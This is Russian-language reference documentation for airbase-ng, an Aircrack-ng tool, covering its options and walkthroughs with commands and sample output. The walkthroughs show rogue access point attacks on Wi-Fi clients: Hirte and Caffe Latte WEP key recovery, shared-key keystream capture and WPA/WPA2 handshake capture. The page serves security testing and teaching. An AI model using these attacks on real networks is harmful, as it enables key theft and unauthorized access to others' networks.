Airbase-ng


Описание Airbase-ng

Airbase-ng – это многоцелевой инструмент, предназначенный для атаки клиентов, а не точки доступа.

Некоторые из его многочисленных возможностей:

  • Реализация атаки Caffe Latte на WEP клиентов
  • Реализация атаки Hirte на WEP клиентов
  • Способность вызывать захват WPA/WPA2 рукопожатий
  • Возможность выступать в качестве ad-hoc точки доступа
  • Возможность выступать в качестве полноценной точки доступа
  • Возможность отфильтровывать клиентов по SSID или по MAC адресу
  • Возможность манипулировать и повторно отправлять пакеты
  • Возможность шифровать отправляемые пакеты и расшифровывать получаемые пакеты

Главная идея реализации заключается в том, что она должна стимулировать клиентов ассоциироваться с поддельной ТД, не мешая им иметь доступ к реальной ТД.

При запуске airbase-ng создаётся отводной интерфейс (atX). Он может использоваться для получения расшифрованных пакетов или отправки зашифрованных пакетов.

Поскольку реальные клиенты почти наверняка будут отправлять пробные запросы (probe) для обычных/настроенных сетей, эти кадры важны для привязывания клиента к нашей softAP. В этом случае ТД будет отвечать на любые пробные запросы соответствующим пробным ответом, который говорит клиенту аутентифицироваться на BSSID от airbase-ng. Следует сказать, что этот режим может нарушить корректность работы многих ТД на том же канале.

ПРЕДУПРЕЖДЕНИЕ: airbase-ng может легко нарушать работы точек доступа вокруг вас. Где возможно, используйте фильтры, чтобы минимизировать эти последствия. Всегда действуйте ответственно и не нарушайте работу сетей, которые не принадлежат вам.

Домашняя страница: http://aircrack-ng.org/

Автор: Thomas d’Otreppe, Первоначальная работа: Christophe Devine

Лицензия: GPLv2

Справка по Airbase-ng

использование: 


airbase-ng <опции> <интерфейс воспроизведения>
  Опции:

      -a bssid         : установить MAC адрес точки доступа
      -i iface         : захватывать пакеты с этого интерфейса
      -w WEP key       : использовать этот WEP для (де)шифрования пакетов
      -h MAC           : mac источника для режима MITM
      -f disallow      : отключить указанные клиентские MAC (по умолчанию: allow)
      -W 0|1           : [не] устанавливать флаг WEP в маячках (beacon) 0|1 (по умолчанию: auto)
      -q               : тихий (не печатать статистику)
      -v               : вербальный (печатать больше сообщений)
      -A               : режим Ad-Hoc (позволяет другим клиентам быть равнозначными участниками)
      -Y in|out|both   : внешняя обработка пакетов
      -c channel       : устанавливает канал для запускаемой ТД
      -X               : скрытая ESSID
      -s               : принудительная аутентификация общим ключом (по умолчанию: auto)
      -S               : установить длину вызова общего ключа (по умолчанию: 128)
      -L               : атака Caffe-Latte WEP (используйте, если драйвер не может отправлять фраги)
      -N               : атака cfrag WEP (рекомендуется)
      -x nbpps         : количество пакетов в секунду (по умолчанию: 100)
      -y               : отключить ответы на широковещательные зонды
      -0               : установить все тэги WPA,WEP,open. Не может использоваться с -z & -Z
      -z type          : установить тэги WPA1. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
      -Z type          : то же, что и -z, но для WPA2
      -V type          : фальшивый EAPOL 1=MD5 2=SHA1 3=auto
      -F prefix        : записать все отправленные и полученные кадры в файл pcap 
      -P               : отвечать всем зондам, даже когда определены ESSID
      -I interval      : установить значение интервала маячков в мс
      -C seconds       : включить отправку зондов ESSID, которые обнаруженны в пробных запросах (требует -P)
      -n hex           : Использовать специфичный ANonce когда делается 4-этапное рукопожатие

  Опции фильтров:
      --bssid MAC      : BSSID для фильтрации/использования
      --bssids file    : прочитать список BSSID из этого файла
      --client MAC     : MAC клиента для фильтрации
      --clients file   : прочитать список MAC из этого файла
      --essid ESSID    : указать единичный ESSID (по умолчанию: default)
      --essids file    : прочитать список ESSID из этого файла

  Help:
      --help           : Показать справку (сокращённо -H)

Руководство по Airbase-ng

-a <bssid>

Если BSSID не указана явно посредством "-a <BSSID>", тогда используется текущий MAC указанного интерфейса.

-i <iface>

Если вы задали интерфейс этой опцией, тогда пакеты также захватываются и обрабатываются от этого интерфейса в дополнении к интерфейсу воспроизведения.

-w <WEP key>

Если в качестве шифрования следует использовать WEP, тогда параметр "-w <WEP key>" устанавливает ключ (де)шифрования. Достаточно позволить airbase-ng самой установить все соответствующие флаги.

Если softAP работает с WEP шифрование, клиент может выбрать использовать открытую систему аутентификацию или аутентификацию с общим ключом. В airbase-ng поддерживаются оба метода. Но для получения ключевого потока (keystream) пользователь может попробовать принудить клиента использовать аутентификацию с общим ключом. "-s" принудительно включает аутентификацию общим ключом, а "-S <len>" устанавливает длину вызова.

-h <MAC>

Это исходный MAC для атаки человек-посередине. Также должна быть определена "-M".

-f <disallow>

Если эта опция не определена, то используется значение по умолчанию "-f allow". Оно означает, что различные MAC фильтры клиентов (-d и -D) определяют, какие клиенты принимаются.

Используя опцию "-f disallow", это меняет выбор на противоположный и заставляет airbase игнорировать клиентов, заданных этими фильтрами.

-W <0|1>

Это устанавливает маячковый (beacon) WEP флаг. Помните, что клиенты будут нормально подключаться только к ТД, которые такие же как они сами. Имеется ввиду WEP к WEP, open к open.

Опция "auto" позволяет airbase-ng автоматически устанавливать флаг основываясь на контексте других указанных опций. Например, если вы установите WEP ключ в -w, тогда флаг маяка будет установлен на WEP.

Одно из других использований "auto" — это иметь дело с клиентами, которые автоматически подстраивают их тип подключения. Хотя таких очень мало.

На практике лучше всего установить это значение к типу клиентов, с которыми вы имеете дело.

-q

Это подавляет вывод любой статистики или информации о статусе.

-v

Это печатает дополнительные сообщения и подробности для помощи в отладке.

-M

Эта опция ещё не реализована. Это атака человек-посередине между указанными клиентами и BSSID.

-A, --ad-hoc

Это заставляет airbase-ng вести себя как ad-hoc клиент вместо нормальной точки доступа.


В режиме ad-hoc airbase-ng также отправляет маячки, но не требует какой-либо аутентификации/ассоциации. Он может быть активирован использованием "-A". Программная ТД поднастроит все флаги, необходимые для автоматической симуляции станции режима ad-hoc и сгенерирует случайный MAC, который используется как CELL MAC вместо BSSID. Его можно переназначить тэгом "-a <BSSID>". Интерфейс MAC затем будет использоваться в качестве mac источника, который может быть изменён с "-h <sourceMAC>".

-Y <in|out|both>

Параметр "-Y" включает режим «внешней обработки». Он создаёт второй интерфейс "atX", который используется для повторного воспроизведения/модификации/отбрасывания или инъекции пакетов по желанию. Этот интерфейс также должен быть поднят с ifconfig и нужен внешний инструмент для создания петли на этом интерфейсе.

Структура пакетов довольно проста: ethernet заголовок (14 байтов) игнорируется и сразу после него следует полный кадр ieee80211 тем же самым образом, как если бы он обрабатывался airbase-ng (для входящих пакетов) или перед тем, как пакеты отправляются с беспроводной карты (исходящие пакеты). Этот модуль прерывает все пакеты с данными и закольцовывает их через внешнее приложение, которое решает, что с ними дальше случиться. MAC и IP второго отводного интерфейса не играют роли, поскольку реальные ethernet кадры на этом интерфейсе всё равно удаляются.

Имеется 3 аргумента для "-Y": "in", "out" и "both", которые определяют направление кадров, которые будут закольцованы на внешнее приложение. Очевидно, "in" перенаправляет только входящие (через беспроводной сетевой интерфейс) кадры, а исходящие кадры не трогаются. "out" делает противоположное, закольцовывает только входящие пакеты, а "both" отправляет пакеты обоих направлений на второй отводной интерфейс.

Имеется маленький и простой пример приложения для воспроизведения всех кадров на втором интерфейсе. Инструмент называется "replay.py" и размещается в "./test". Оно написано на python, но язык не имеет значения. Оно использует pcapy для чтения кадров и scapy для возможного изменения/показа и повторной инъекции кадров. Сам по себе инструмент просто воспроизводит все кадры и печатает краткий итог о полученных кадрах. Переменная "packet" содержит полный ieee80211 пакет, который может быть с лёгкостью рассечён и изменён с scapy.

Это можно сравнить с фильтрами ettercap, но это мощнее, поскольку может использоваться реальный язык программирования для построения сложной логики фильтрации и кастомизации пакетов. Обратной стороной использования python является добавление задержки примерно в 100ms и довольно большое на высокоскоростных сетях использование cpu, но он прекрасно подходит для демонстрации возможностей, при этом требуется код всего на несколько строк.

-c <канал>

Это используется для указания канала, на котором запускается точка доступа.

-X, --hidden

Это заставляет точку доступа прятать SSID и не отправлять в эфир это значение.

-s

Когда опция определена, она принудительно включает для клиентов аутентификацию общим ключом.

Программная ТД будет отправлять отказ "authentication method unsupported" на любые запросы с системой открытой аутентификации, если указана "-s".

-S


Она устанавливает длину вызова общего ключа, который может быть любым от 16 до 1480. По умолчанию это 128 байт. Это количество байт, используемое для случайного вызова. Поскольку один тэг может содержать максимальный размер в 255 байт, любое значение выше 255 создаёт несколько тэгов вызова, пока все указанные байты не будут записаны. Многие клиенты игнорируют значения, отличающееся от 128 байт, поэтому эта опция может работать не всегда.

-L, --caffe-latte

Airbase-ng также содержит новую атаку caffe-latte, которая также реализована в aireplay-ng как атака "-6". Она может использоваться с "-L" или "--caffe-latte".

"-x <pps>"

Устанавливает количество пакетов для отправки в секунду при выполнении атаки caffe-latte. На данный момент эта атака не останавливается, она непрерывно отправляет arp запросы. Для захвата ответов требуется Airodump-ng.

-N, --cfrag

Эта атака прослушивает ARP запросы или IP пакеты от клиента. При получении, маленькое количество PRGA извлекается и затем используется для создания пакета запроса ARP, нацеленного на клиента. Этот ARP запрос на самом деле состоит из нескольких фрагментов пакета, при получении которых клиент ответит.

Эта атака особенно хорошо работает в отношении ad-hoc сетей. А также она может использоваться в отношении клиентов softAP и клиентов нормальных ТД.

-x <nbpps>

Опция устанавливает число отправляемых в секунду пакетов (по умолчанию: 100).

-y

При использовании этой опции, фальшивая ТД не будет отвечать на широковещательные пробы. В широковещательных пробах не определена уникальным образом конкретная ТД. Обычно, большинство ТД ответят пробным ответом на широковещательную пробу. Этот флаг не даст этому случиться. Фальшивая ТД будет отвечать когда однозначно запрашивается конкретная ТД.

-0

Опция приводит к включению всех WPA/WPA2/WEP тегов в отправляемых маячках. Её нельзя указать одновременно с -z или -Z.

-z <тип>

Опция определяет WPA теги в маячках. Валидными являются: 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104.

-Z <тип>

как и -z, но для WPA2

-V <type>

Опция определяет действительные EAPOL типы. Действительные значения: 1=MD5 2=SHA1 3=auto

-F <prefix>

Эта опция заставляет airbase-ng записывать все отправленные и полученные пакеты на диск в файл pcap. Это начало (префикс) файла (как airodump-ng -w).

-P

Опция заставляет фальшивую точку доступа отвечать на все пробы независимо от указанного ESSID.

-I <интервал>

Опция устанавливает время в миллисекундах между каждым маячком.

-C <Секунды>

Отправлять ESSID в маячках это количество секнуд. Хорошим обычным значением является "-C 60" (требует -P).


При запуске в режиме по умолчанию (без ESSID) или с параметром -P, опция -C может использоваться для включения широковещательной рассылки маячков увиденных ESSID в направленных пробах. Это позволяет одному клиенту, который отсылает пробы на сеть, вызвать маячок для той же сети на короткий период времени (параметр -C, который является количеством секунд для широковещательной рассылки пробных запросов). Это хорошо срабатывает, когда некоторые клиенты отправляют направленные пробы, в то время как остальные пассивно слушают маяки. Клиент, который делает направленные пробы, вызывает маячок, который пробуждает пассивных клиентов и заставляет пассивных клиентов также присоединиться к сети. Это особенно полезно с клиентами Vista (которые во многих ситуациях пассивно слушают маячки), которые делят те же сети WiFi с клиентами Linux/Mac OS X, которые отправляют направленные пробы.

-n <hex>

ANonce (nonce с ТД) используется вместо случайного. Им должны быть 64 шестнадцатеричных символа.

Маячковые кадры (Beacon Frames)

Маячковые кадры содержат ESSID в том случае, если указана ровно одна ESSID, если установлено несколько, ESSID будет спрятана в маячковом кадре с длиной 1. Если ESSID не установлена, маячок будет содержать “default” в качестве ESSID, но принимать все ESSID в запросах ассоциирования. Если ESSID должна всё время быть спрятана в маячковом кадре (читай: без или с одной установленной ESSID), то может быть установлен флаг “-X”.

Обработка контрольных кадров

Контрольные кадры (ack/rts/cts) никогда не отправляются этой программой, но иногда считываются (прошивка должна обрабатывать их). Управляющие и кадры с данными всегда могут быть отправлены, перед ассоциацией не требуется аутентифицироваться или даже отправка фреймов с данными. Они могут быть отправлены сразу. Реальные клиенты будут всё равно аутентифицироваться и ассоциироваться и softAP должна отправлять корректные ответы, но airbase-ng не заботится о проверке свойств и просто позволяет всем станциям подключаться (учитывая фильтруемые ESSID и клиентские MAC). Поэтому аутентификация не может потерпеть неудачу (кроме случаев, когда принудительно указана аутентификация общим ключом). То же самое для фазы ассоциации. ТД в нормальном режиме никогда не будет отправлять кадры деаутентификации и деассоциации.

Это было реализовано таким образом, чтобы максимизировать совместимость и шансы сохранить станцию подключённой.

Фильтрация

Доступны богатые возможности фильтрации.

Для ограничения поддерживаемых ESSID вы можете указать “-e <ESSID>” для добавления ESSID в список разрешённых ESSID или использовать “-E <ESSIDfile>” для чтения списка разрешённых ESSID из этого файла (одна ESSID на строку).

То же самое может быть проделано для клиентских MAC (своего рода MAC-фильтр). “-d <MAC>” добавляет единичный MAC в список, “-D <MACfile>” добавляет все MAC из файла <MACfile> в этот список (опять, один MAC на строку).

Список MAC может использоваться для разрешения клиентов только из этого списка и блокировки всех других (по умолчанию), или для блокировки указанных, и разрешения всех других. Это контролируется опциями “-f allow” или “-f disallow”. “allow” создаёт белый список (по умолчанию в случае если “-f” не установлена), а “disallow” строит чёрные списки (второй случай).

Отводной интерфейс

При каждом запуске airbase создаётся отводной интерфейс (atX). Для его использования запустите “ifconfig atX up” где X это действительный номер интерфейса.

Этот интерфейс имеет много применений:

  • Если с “-w” установлен ключ шифрования, тогда входящие пакеты будут шифроваться и представлены на интерфейсе.
  • Пакеты, отправленные на этот интерфейс, будут переданы. Если используется опция “-w”, то дополнительно они ещё будут шифроваться.

Примеры запуска Airbase-ng

Далее примеры использования. Вам требуется только одно беспроводное устройство, даже если в некоторых примерах используются две карты.

Простой пример

Использование “airbase-ng <iface>” достаточно для установки ТД без какого-либо шифрования. Она будет принимать подключения с любых MAC для каждой ESSID до тех пор, пока аутентификация и ассоциация направлены на BSSID.

В действительность вы не много сможете сделать в этом сценарии. Тем не менее, будет представлен список клиентов, которые подключены, плюс метод шифрования и SSID.

Атака Hirte в режиме Точка Доступа

Эта атака получает от клиента wep ключ. Она зависит от получения хотя бы одного ARP запроса или IP пакета от клиента после его ассоциации с фальшивой ТД.

Введите:

airbase-ng -c 9 -e teddy -N -W 1 rausb0

Где:

  • -c 9 указывает канал
  • -e teddy фильтрует единичную SSID
  • -N означает атаку Hirte
  • -W 1 устанавливает в маячках флаг WEP
  • rausb0 определяет используемый беспроводной интерфейс

Система отвечает:

 18:57:54  Created tap interface at0
 18:57:55  Client 00:0F:B5:AB:CB:9D associated (WEP) to ESSID: "teddy"

В другом окне консоли запустите:

airodump-ng -c 9 -d 00:06:62:F8:1E:2C -w cfrag wlan0

Где:

  • -c 9 определяет канал
  • -d 00:06:62:F8:1E:2C фильтрует захваченные данные по MAC для фальшивой ТД (это необязательно)
  • -w определяет префикс имени файла для сохранения захваченных данных
  • wlan0 указывает беспроводной интерфейс, на котором захватывать данные

Когда airbase-ng захватывает пакет от клиента и успешно начинает атаку, окно выглядит примерно так:

 CH  9 ][ Elapsed: 8 mins ][ 2008-03-20 19:06                                         
                                                                                                            
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
  00:06:62:F8:1E:2C  100  29      970    14398   33   9  54  WEP  WEP         teddy                           
                                                                                                            
  BSSID              STATION            PWR   Rate  Lost  Packets  Probes                                      
                                                                                                            
  00:06:62:F8:1E:2C  00:0F:B5:AB:CB:9D   89   2-48     0   134362   

Теперь вы можете запустить в другом консольном окне aircrack-ng для получения ключа key. В качестве альтернативы можно использовать опцию "-F <префикс имени файла>" airbase-ng для непосредственной записи файла захвата вместо использования airbase-ng.

Атака Hirte в режиме Ad-Hoc

Эта атака получает от клиента wep ключ. Она зависит от получения хотя бы одного ARP запроса или IP пакета от клиента после его ассоциации с фальшивой ТД.

Введите:

airbase-ng -c 9 -e teddy -N -W 1 -A rausb0

Где:

  • -c 9 устанавливает канал
  • -e teddy фильтрует единичную SSID
  • -N задаёт Hirte атаку
  • -W 1 принудительно включает WEP в маячках
  • -A устанавливает режим ad-hoc
  • rausb0 устанавливает используемый беспроводной интерфейс

Остальное будет таким же как режиме ТД.

Атака Caffe Latte Attack в режиме Точка Доступа

Эта атака получает от клиента WEP ключ. Она зависит от получения хотя бы одного запроса gratuitous ARP от клиента после его ассоциации с фальшивой ТД.

Введите:

airbase-ng -c 9 -e teddy -L -W 1 rausb0

Где:

  • -c 9 задаёт канал
  • -e teddy фильтрует одну SSID
  • -L задаёт атаку Caffe Latte
  • -W 1 принудительно включает WEP в маячках
  • rausb0 задаёт используемый беспроводной интерфейс

Остальное также как и в клиентской атаке Hirte.

Захват общего ключа

Это пример захвата от клиента PRGA общего ключа ассоциации.

Введите:

airbase-ng -c 9 -e teddy -s -W 1 wlan0

Где:

  • -c 9 определяет канал
  • -e teddy фильтрует одну SSID
  • -s принудительная аутентификация общим ключом
  • -W 1 настраивает маячки на WEP
  • wlan0 определяет используемый беспроводной интерфейс

Система отвечает:

 15:08:31  Created tap interface at0
 15:13:38  Got 140 bytes keystream: 00:0F:B5:88:AC:82
 15:13:38  SKA from 00:0F:B5:88:AC:82
 15:13:38  Client 00:0F:B5:88:AC:82 associated to ESSID: "teddy"

Последние три строки появляются когда клиент ассоциируется с фальшивой ТД.

В другом консольном окне запустите:

airodump-ng -c 9 wlan0

Где:

  • -c 9 указывает канал
  • wlan0 указывает используемый беспроводной интерфейс

При успешном захвате общего ключа аутентификации окно выглядит примерно так. Обратите внимание на “140 bytes keystream: 00:C0:CA:19:F9:65” в верхнем правом углу:

 CH  9 ][ Elapsed: 9 mins ][ 2008-03-12 15:13 ][ 140 bytes keystream: 00:C0:CA:19:F9:65                       
                                                                                                            
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
  00:C0:CA:19:F9:65   87  92     5310        0    0   9  54  WEP  WEP    SKA  teddy                            
                                                                                                            
  BSSID              STATION            PWR   Rate  Lost  Packets  Probes                                      
                                                                                                            
  00:C0:CA:19:F9:65  00:0F:B5:88:AC:82   83   0- 1     0     4096  teddy 

В качестве альтернативы используйте с airbase-ng опцию «-F <префикс имени файла>» для прямой записи файла захвата вместо использования airodump-ng.

Захват рукопожатия WPA

Далее пример как захватить WPA рукопожатие.

Введите:

airbase-ng -c 9 -e teddy -z 2 -W 1 rausb0

Где:

  • -c 9 устанавливает канал
  • -e teddy фильтрует одну SSID
  • -z 2 задаёт TKIP
  • -W 1 устанавливает флаг WEP, поскольку некоторые клиенты без него путаются.
  • rausb0 указывает используемый беспроводной интерфейс

Тип -z нужно изменить в зависимости от шифра, который как вы думаете будет использовать клиент. TKIP очень типично для WPA.

Система отвечает:

 10:17:24  Created tap interface at0
 10:22:13  Client 00:0F:B5:AB:CB:9D associated (WPA1;TKIP) to ESSID: "teddy"

Последняя строка появляется только когда клиент ассоциируется.

В другом окне консоли наберите:

airodump-ng -c 9 -d 00:C0:C6:94:F4:87 -w cfrag wlan0
  • -c 9 определяет канал
  • -d 00:C0:C6:94:F4:87 фильтрует данные по MAC, которые должна захватывать фальшивая ТД. Это MAC карты, запустившей фальшивую ТД. Это опционально.
  • -w определяет имя файла с захваченными данными
  • wlan0 определяет сетевой интерфейс, на котором захватывать данные

Когда клиент подключается, в верхнем правом углу появляется предупреждение “WPA handshake: 00:C0:C6:94:F4:87” как на скриншоте ниже:

 CH  9 ][ Elapsed: 5 mins ][ 2008-03-21 10:26 ][ WPA handshake: 00:C0:C6:94:F4:87                             
                                                                                                            
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 
 00:C0:C6:94:F4:87  100  70     1602       14    0   9  54  WPA  TKIP   PSK  teddy                           

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 00:C0:C6:94:F4:87  00:0F:B5:AB:CB:9D   86   2- 1     0       75    

Ещё вместо использования airodump-ng для захвата файла, можно использовать опцию «-F <file name prefix>» с airbase-ng для прямой записи файла захвата.

Запуск “aircrack-ng cfrag-01.cap” подтверждает, что захвачен валидное WPA рукопожатие:

 Opening cfrag-01.cap
 Read 114392 packets.
 
 #  BSSID              ESSID                     Encryption
 
 1  00:C0:C6:94:F4:87  teddy                     WPA (1 handshake)

Захват рукопожатия WPA2

Захват WPA2 идентичен примеру с WPA. Обычно разница заключается в -Z 4 (CCMP шифр) вместо -z 2.

Введите:

airbase-ng -c 9 -e teddy -Z 4 -W 1 rausb0

Суть такая же, как и при захвате WPA рукопожатия.

softAP

ТОЛЬКО ДЛЯ ЭКСПЕРТОВ: Эта функциональность требует продвинутых знаний Linux и работы сети.

Будет создан новый отводной интерфейс “atX”, который будет выступать как «проводная сторона» до ТД. Для использования ТД этот новый интерфейс должен быть поднят командой ifconfig и требует IP. Назначенный MAC автоматически устанавливается на BSSID [по умолчанию MAC беспроводного интерфейса]. Когда назначен IP и клиент использует статичный IP из той же самой подсети, то имеется рабочее Ethernet подключение между ТД и клиентом. Любые демоны могут быть назначены на этот интерфейс, например, dhcp и dns сервер. Вместе с ip_forwarding и надлежащим правилом iptable для маскировки, softAP действует как беспроводной роутер. Любые инструменты, которые работают с ethernet, могут быть навешаны на этот интерфейс.

Установка Airbase-ng

Программа предустановлена в Kali Linux.

Установка в BlackArch

Программа предустановлена в BlackArch.

Установка в другие операционные системы

Эта программа из пакета Aircrack-ng. Т.е. для её установки нужно установить Aircrack-ng.

Скриншоты Airbase-ng

Это утилита командной строки.

Инструкции по Airbase-ng


Близкие программы:

  • AtEar (100%)
  • gerix wifi cracker 2 (88.9%)
  • Aircrack-ng (программа) (81.9%)
  • Besside-ng (81.9%)
  • HandShaker (81.9%)
  • hcxtools (RANDOM - 52.9%)
  • Рекомендуется Вам:

    Comments are Closed